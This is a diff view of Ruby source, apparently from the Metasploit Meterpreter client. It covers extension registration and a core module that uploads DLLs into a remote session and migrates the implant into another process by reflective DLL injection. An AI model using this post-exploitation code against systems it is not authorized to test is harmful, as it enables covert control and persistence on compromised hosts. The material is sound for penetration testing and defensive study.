if ((diff = new - old).empty?)
|
232
|
+
return false
|
233
|
+
end
|
234
|
+
|
235
|
+
klass = Rex::Post::Meterpreter::Extensions.const_get(diff[0]).const_get(diff[0])
|
236
|
+
|
237
|
+
# Save the module name to class association now that the code is
|
238
|
+
# loaded.
|
239
|
+
self.class.set_ext_hash(name.downcase, klass)
|
240
|
+
end
|
241
|
+
|
242
|
+
# Create a new instance of the extension
|
243
|
+
inst = klass.new(self)
|
244
|
+
|
245
|
+
self.ext.aliases[inst.name] = inst
|
246
|
+
|
247
|
+
return true
|
248
|
+
end
|
249
|
+
|
250
|
+
#
|
251
|
+
# Deregisters an extension alias of the supplied name.
|
252
|
+
#
|
253
|
+
def deregister_extension(name)
|
254
|
+
self.ext.aliases.delete(name)
|
255
|
+
end
|
256
|
+
|
257
|
+
#
|
258
|
+
# Enumerates all of the loaded extensions.
|
259
|
+
#
|
260
|
+
def each_extension(&block)
|
261
|
+
self.ext.aliases.each(block)
|
262
|
+
end
|
263
|
+
|
264
|
+
#
|
265
|
+
# Registers an aliased extension that can be referenced through
|
266
|
+
# client.name.
|
267
|
+
#
|
268
|
+
def register_extension_alias(name, ext)
|
269
|
+
self.ext_aliases.aliases[name] = ext
|
270
|
+
end
|
271
|
+
|
272
|
+
#
|
273
|
+
# Registers zero or more aliases that are provided in an array.
|
274
|
+
#
|
275
|
+
def register_extension_aliases(aliases)
|
276
|
+
aliases.each { |a|
|
277
|
+
register_extension_alias(a['name'], a['ext'])
|
278
|
+
}
|
279
|
+
end
|
280
|
+
|
281
|
+
#
|
282
|
+
# Deregisters a previously registered extension alias.
|
283
|
+
#
|
284
|
+
def deregister_extension_alias(name)
|
285
|
+
self.ext_aliases.aliases.delete(name)
|
286
|
+
end
|
287
|
+
|
288
|
+
#
|
289
|
+
# Dumps the extension tree.
|
290
|
+
#
|
291
|
+
def dump_extension_tree()
|
292
|
+
items = []
|
293
|
+
items.concat(self.ext.dump_alias_tree('client.ext'))
|
294
|
+
items.concat(self.ext_aliases.dump_alias_tree('client'))
|
295
|
+
|
296
|
+
return items.sort
|
297
|
+
end
|
298
|
+
|
299
|
+
#
|
300
|
+
# The extension alias under which all extensions can be accessed by name.
|
301
|
+
# For example:
|
302
|
+
#
|
303
|
+
# client.ext.stdapi
|
304
|
+
#
|
305
|
+
#
|
306
|
+
attr_reader :ext
|
307
|
+
#
|
308
|
+
# The socket the client is communicating over.
|
309
|
+
#
|
310
|
+
attr_reader :sock
|
311
|
+
#
|
312
|
+
# The timeout value to use when waiting for responses.
|
313
|
+
#
|
314
|
+
attr_accessor :response_timeout
|
315
|
+
#
|
316
|
+
# Whether to send pings every so often to determine liveness.
|
317
|
+
#
|
318
|
+
attr_accessor :send_keepalives
|
319
|
+
#
|
320
|
+
# Whether this session is alive. If the socket is disconnected or broken,
|
321
|
+
# this will be false
|
322
|
+
#
|
323
|
+
attr_accessor :alive
|
324
|
+
#
|
325
|
+
# The unique target identifier for this payload
|
326
|
+
#
|
327
|
+
attr_accessor :target_id
|
328
|
+
|
329
|
+
protected
|
330
|
+
attr_accessor :parser, :ext_aliases # :nodoc:
|
331
|
+
attr_writer :ext, :sock # :nodoc:
|
332
|
+
end
|
333
|
+
|
334
|
+
end; end; end
|
335
|
+
|
@@ -0,0 +1,274 @@
|
|
1
|
+
#!/usr/bin/env ruby
|
2
|
+
|
3
|
+
require 'rex/post/meterpreter/packet'
|
4
|
+
require 'rex/post/meterpreter/extension'
|
5
|
+
require 'rex/post/meterpreter/client'
|
6
|
+
require 'msf/core/payload/windows'
|
7
|
+
|
8
|
+
module Rex
|
9
|
+
module Post
|
10
|
+
module Meterpreter
|
11
|
+
|
12
|
+
###
|
13
|
+
#
|
14
|
+
# This class is responsible for providing the interface to the core
|
15
|
+
# client-side meterpreter API which facilitates the loading of extensions
|
16
|
+
# and the interaction with channels.
|
17
|
+
#
|
18
|
+
#
|
19
|
+
###
|
20
|
+
class ClientCore < Extension
|
21
|
+
|
22
|
+
#
|
23
|
+
# Initializes the 'core' portion of the meterpreter client commands.
|
24
|
+
#
|
25
|
+
def initialize(client)
|
26
|
+
super(client, "core")
|
27
|
+
end
|
28
|
+
|
29
|
+
##
|
30
|
+
#
|
31
|
+
# Core commands
|
32
|
+
#
|
33
|
+
##
|
34
|
+
|
35
|
+
#
|
36
|
+
# Loads a library on the remote meterpreter instance. This method
|
37
|
+
# supports loading both extension and non-extension libraries and
|
38
|
+
# also supports loading libraries from memory or disk depending
|
39
|
+
# on the flags that are specified
|
40
|
+
#
|
41
|
+
# Supported flags:
|
42
|
+
#
|
43
|
+
# LibraryFilePath
|
44
|
+
# The path to the library that is to be loaded
|
45
|
+
#
|
46
|
+
# TargetFilePath
|
47
|
+
# The target library path when uploading
|
48
|
+
#
|
49
|
+
# UploadLibrary
|
50
|
+
# Indicates whether or not the library should be uploaded
|
51
|
+
#
|
52
|
+
# SaveToDisk
|
53
|
+
# Indicates whether or not the library should be saved to disk
|
54
|
+
# on the remote machine
|
55
|
+
#
|
56
|
+
# Extension
|
57
|
+
# Indicates whether or not the library is a meterpreter extension
|
58
|
+
#
|
59
|
+
def load_library(opts)
|
60
|
+
library_path = opts['LibraryFilePath']
|
61
|
+
target_path = opts['TargetFilePath']
|
62
|
+
load_flags = LOAD_LIBRARY_FLAG_LOCAL
|
63
|
+
|
64
|
+
# No library path, no cookie.
|
65
|
+
if (library_path == nil)
|
66
|
+
raise ArgumentError, "No library file path was supplied", caller
|
67
|
+
end
|
68
|
+
|
69
|
+
# Set up the proper loading flags
|
70
|
+
if (opts['UploadLibrary'])
|
71
|
+
load_flags &= ~LOAD_LIBRARY_FLAG_LOCAL
|
72
|
+
end
|
73
|
+
if (opts['SaveToDisk'])
|
74
|
+
load_flags |= LOAD_LIBRARY_FLAG_ON_DISK
|
75
|
+
end
|
76
|
+
if (opts['Extension'])
|
77
|
+
load_flags |= LOAD_LIBRARY_FLAG_EXTENSION
|
78
|
+
end
|
79
|
+
|
80
|
+
# Create a request packet
|
81
|
+
request = Packet.create_request('core_loadlib')
|
82
|
+
|
83
|
+
# If we must upload the library, do so now
|
84
|
+
if ((load_flags & LOAD_LIBRARY_FLAG_LOCAL) != LOAD_LIBRARY_FLAG_LOCAL)
|
85
|
+
image = ''
|
86
|
+
|
87
|
+
::File.open(library_path, 'rb') { |f|
|
88
|
+
image = f.read
|
89
|
+
}
|
90
|
+
|
91
|
+
if (image != nil)
|
92
|
+
request.add_tlv(TLV_TYPE_DATA, image, false, true)
|
93
|
+
else
|
94
|
+
raise RuntimeError, "Failed to serialize library #{library_path}.", caller
|
95
|
+
end
|
96
|
+
|
97
|
+
# If it's an extension we're dealing with, rename the library
|
98
|
+
# path of the local and target so that it gets loaded with a random
|
99
|
+
# name
|
100
|
+
if (opts['Extension'])
|
101
|
+
library_path = "ext" + rand(1000000).to_s + ".#{client.binary_suffix}"
|
102
|
+
target_path = library_path
|
103
|
+
end
|
104
|
+
end
|
105
|
+
|
106
|
+
# Add the base TLVs
|
107
|
+
request.add_tlv(TLV_TYPE_LIBRARY_PATH, library_path)
|
108
|
+
request.add_tlv(TLV_TYPE_FLAGS, load_flags)
|
109
|
+
|
110
|
+
if (target_path != nil)
|
111
|
+
request.add_tlv(TLV_TYPE_TARGET_PATH, target_path)
|
112
|
+
end
|
113
|
+
|
114
|
+
# Transmit the request and wait the default timeout seconds for a response
|
115
|
+
response = self.client.send_packet_wait_response(request, self.client.response_timeout)
|
116
|
+
|
117
|
+
# No response?
|
118
|
+
if (response == nil)
|
119
|
+
raise RuntimeError, "No response was received to the core_loadlib request.", caller
|
120
|
+
elsif (response.result != 0)
|
121
|
+
raise RuntimeError, "The core_loadlib request failed with result: #{response.result}.", caller
|
122
|
+
end
|
123
|
+
|
124
|
+
return true
|
125
|
+
end
|
126
|
+
|
127
|
+
#
|
128
|
+
# Loads a meterpreter extension on the remote server instance and
|
129
|
+
# initializes the client-side extension handlers
|
130
|
+
#
|
131
|
+
# Module
|
132
|
+
# The module that should be loaded
|
133
|
+
#
|
134
|
+
# LoadFromDisk
|
135
|
+
# Indicates that the library should be loaded from disk, not from
|
136
|
+
# memory on the remote machine
|
137
|
+
#
|
138
|
+
def use(mod, opts = { })
|
139
|
+
if (mod == nil)
|
140
|
+
raise RuntimeError, "No modules were specified", caller
|
141
|
+
end
|
142
|
+
# Get us to the installation root and then into data/meterpreter, where
|
143
|
+
# the file is expected to be
|
144
|
+
path = ::File.join(Msf::Config.install_root, 'data', 'meterpreter', 'ext_server_' + mod.downcase + ".#{client.binary_suffix}")
|
145
|
+
|
146
|
+
if (opts['ExtensionPath'])
|
147
|
+
path = opts['ExtensionPath']
|
148
|
+
end
|
149
|
+
|
150
|
+
path = ::File.expand_path(path)
|
151
|
+
|
152
|
+
# Load the extension DLL
|
153
|
+
if (load_library(
|
154
|
+
'LibraryFilePath' => path,
|
155
|
+
'UploadLibrary' => true,
|
156
|
+
'Extension' => true,
|
157
|
+
'SaveToDisk' => opts['LoadFromDisk']))
|
158
|
+
client.add_extension(mod)
|
159
|
+
end
|
160
|
+
|
161
|
+
return true
|
162
|
+
end
|
163
|
+
|
164
|
+
#
|
165
|
+
# Migrates the meterpreter instance to the process specified
|
166
|
+
# by pid. The connection to the server remains established.
|
167
|
+
#
|
168
|
+
def migrate( pid )
|
169
|
+
keepalive = client.send_keepalives
|
170
|
+
client.send_keepalives = false
|
171
|
+
process = nil
|
172
|
+
binary_suffix = nil
|
173
|
+
|
174
|
+
# Load in the stdapi extension if not allready present so we can determine the target pid architecture...
|
175
|
+
client.core.use( "stdapi" ) if not client.ext.aliases.include?( "stdapi" )
|
176
|
+
|
177
|
+
# Determine the architecture for the pid we are going to migrate into...
|
178
|
+
client.sys.process.processes.each { | p |
|
179
|
+
if( p['pid'] == pid )
|
180
|
+
process = p
|
181
|
+
break
|
182
|
+
end
|
183
|
+
}
|
184
|
+
|
185
|
+
# We cant migrate into a process that does not exist.
|
186
|
+
if( process == nil )
|
187
|
+
raise RuntimeError, "Cannot migrate into non existant process", caller
|
188
|
+
end
|
189
|
+
|
190
|
+
# We cant migrate into a process that we are unable to open
|
191
|
+
if( process['arch'] == nil or process['arch'].empty? )
|
192
|
+
raise RuntimeError, "Cannot migrate into this process (insufficient privileges)", caller
|
193
|
+
end
|
194
|
+
|
195
|
+
# And we also cant migrate into our own current process...
|
196
|
+
if( process['pid'] == client.sys.process.getpid )
|
197
|
+
raise RuntimeError, "Cannot migrate into current process", caller
|
198
|
+
end
|
199
|
+
|
200
|
+
# Create a new payload stub
|
201
|
+
c = Class.new( ::Msf::Payload )
|
202
|
+
c.include( ::Msf::Payload::Stager )
|
203
|
+
|
204
|
+
# Include the appropriate reflective dll injection module for the target process architecture...
|
205
|
+
if( process['arch'] == ARCH_X86 )
|
206
|
+
c.include( ::Msf::Payload::Windows::ReflectiveDllInject )
|
207
|
+
binary_suffix = "dll"
|
208
|
+
elsif( process['arch'] == ARCH_X86_64 )
|
209
|
+
c.include( ::Msf::Payload::Windows::ReflectiveDllInject_x64 )
|
210
|
+
binary_suffix = "x64.dll"
|
211
|
+
else
|
212
|
+
raise RuntimeError, "Unsupported target architecture '#{process['arch']}' for process '#{process['name']}'.", caller
|
213
|
+
end
|
214
|
+
|
215
|
+
# Create the migrate stager
|
216
|
+
migrate_stager = c.new()
|
217
|
+
migrate_stager.datastore['DLL'] = ::File.join( Msf::Config.install_root, "data", "meterpreter", "metsrv.#{binary_suffix}" )
|
218
|
+
|
219
|
+
payload = migrate_stager.stage_payload
|
220
|
+
|
221
|
+
# Build the migration request
|
222
|
+
request = Packet.create_request( 'core_migrate' )
|
223
|
+
request.add_tlv( TLV_TYPE_MIGRATE_PID, pid )
|
224
|
+
request.add_tlv( TLV_TYPE_MIGRATE_LEN, payload.length )
|
225
|
+
request.add_tlv( TLV_TYPE_MIGRATE_PAYLOAD, payload, false, true)
|
226
|
+
if( process['arch'] == ARCH_X86_64 )
|
227
|
+
request.add_tlv( TLV_TYPE_MIGRATE_ARCH, 2 ) # PROCESS_ARCH_X64
|
228
|
+
else
|
229
|
+
request.add_tlv( TLV_TYPE_MIGRATE_ARCH, 1 ) # PROCESS_ARCH_X86
|
230
|
+
end
|
231
|
+
|
232
|
+
# Send the migration request (bump up the timeout to 60 seconds)
|
233
|
+
response = client.send_request( request, 60 )
|
234
|
+
|
235
|
+
# Disable the socket request monitor
|
236
|
+
client.monitor_stop
|
237
|
+
|
238
|
+
###
|
239
|
+
# Now communicating with the new process
|
240
|
+
###
|
241
|
+
|
242
|
+
# Renegotiate SSL over this socket
|
243
|
+
client.swap_sock_ssl_to_plain()
|
244
|
+
client.swap_sock_plain_to_ssl()
|
245
|
+
|
246
|
+
# Restart the socket monitor
|
247
|
+
client.monitor_socket
|
248
|
+
|
249
|
+
# Update the meterpreter platform/suffix for loading extensions as we may have changed target architecture
|
250
|
+
# sf: this is kinda hacky but it works. As ruby doesnt let you un-include a module this is the simplest solution I could think of.
|
251
|
+
# If the platform specific modules Meterpreter_x64_Win/Meterpreter_x86_Win change significantly we will need a better way to do this.
|
252
|
+
if( process['arch'] == ARCH_X86_64 )
|
253
|
+
client.platform = 'x64/win64'
|
254
|
+
client.binary_suffix = 'x64.dll'
|
255
|
+
else
|
256
|
+
client.platform = 'x86/win32'
|
257
|
+
client.binary_suffix = 'dll'
|
258
|
+
end
|
259
|
+
|
260
|
+
# Load all the extensions that were loaded in the previous instance (using the correct platform/binary_suffix)
|
261
|
+
client.ext.aliases.keys.each { |e|
|
262
|
+
client.core.use(e)
|
263
|
+
}
|
264
|
+
|
265
|
+
# Restore session keep-alives
|
266
|
+
client.send_keepalives = keepalive
|
267
|
+
|
268
|
+
return true
|
269
|
+
end
|
270
|
+
|
271
|
+
end
|
272
|
+
|
273
|
+
end; end; end
|
274
|
+
|